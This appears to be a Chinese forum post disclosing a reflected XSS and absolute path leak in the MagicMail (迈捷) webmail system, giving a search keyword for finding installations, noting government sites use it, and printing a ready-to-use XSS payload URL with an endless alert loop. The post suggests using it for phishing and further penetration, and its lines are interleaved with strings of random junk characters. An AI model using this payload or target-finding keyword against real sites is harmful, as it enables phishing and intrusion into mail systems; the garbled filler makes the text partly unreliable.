今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞! Z- u) e" A( F$ |9 w; w0 h
( D7 `6 [% s. ^7 J
$ B6 \9 ` \: P: z, u0 z0 Y c. u
包含 一个反射性XSS 以及 绝对路径泄漏, T1 I1 s p0 R/ W( L
看了看 貌似全部是linux的。
6 ?" P8 x% @9 p- O* q2 b* E
, r" {6 |/ K c; Y" r7 y) U |2 T$ a关键字:迈捷邮件系统 by MagicMail
8 _) ]( l" ~. o3 o* v$ g# O( y. ~3 F Q* j' ]* J$ H( t \( e K
可以看到很多政府网站都用这个邮件系统
/ q' k d/ e. `9 \5 n- ?0 R9 s- b' C) b
绝对路径 http://madman.in/index.php?login_type=declare&language=
, H6 |# H, h F2 g. k \
' b' C) l* h7 T, U5 n
- P: y) d { {3 g7 ~6 r: B2 u( y; t v0 Y! A& J. G5 h5 V8 }$ P
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E2 O3 {4 \" u" P: P+ [ F C
@0 Q# T Y. l+ y: Y& I+ r& h3 A4 D. e5 ]) }
" y C: y& d- |4 s9 J
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等1 E& n) Z: D. B* A$ { U }
! M0 E8 o& j; B( R4 b
修复方案:看官方补丁吧。
]1 R6 ~; m5 U) n( l. D6 d C5 \0 R |